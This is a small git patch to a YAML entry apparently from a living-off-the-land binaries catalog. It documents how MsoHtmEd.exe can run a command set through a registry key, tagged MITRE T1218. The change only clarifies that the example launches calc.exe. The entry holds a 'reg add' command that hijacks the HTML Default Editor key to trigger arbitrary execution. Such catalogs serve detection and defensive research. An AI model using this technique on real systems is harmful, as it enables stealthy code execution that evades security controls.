From 7cdc9263fb198c884115864c74b71dd65c9ac064 Mon Sep 17 00:00:00 2001 From: C-h4ck-0 <48152831+C-h4ck-0@users.noreply.github.com> Date: Sun, 7 May 2023 14:26:12 +0700 Subject: [PATCH] Update MsoHtmEd.yml --- yml/OtherMSBinaries/MsoHtmEd.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OtherMSBinaries/MsoHtmEd.yml b/yml/OtherMSBinaries/MsoHtmEd.yml index 74dad51..6f2fdd0 100644 --- a/yml/OtherMSBinaries/MsoHtmEd.yml +++ b/yml/OtherMSBinaries/MsoHtmEd.yml @@ -6,7 +6,7 @@ Created: 2022-07-24 Commands: - Command: MsoHtmEd.exe https://any-valid-link-to-download-any-html-file-from.com Description: Execute a command line from the registry - Usecase: Set this registry key with the desired commaned you want to trigger - reg add "HKCU\SOFTWARE\Microsoft\Shared\HTML\Default Editor\shell\edit\command" /f /t REG_SZ /d "calc.exe" + Usecase: Set this registry key with the desired commaned you want to trigger (this example executes calc.exe) - reg add "HKCU\SOFTWARE\Microsoft\Shared\HTML\Default Editor\shell\edit\command" /f /t REG_SZ /d "calc.exe" Category: Execute Privileges: User MitreID: T1218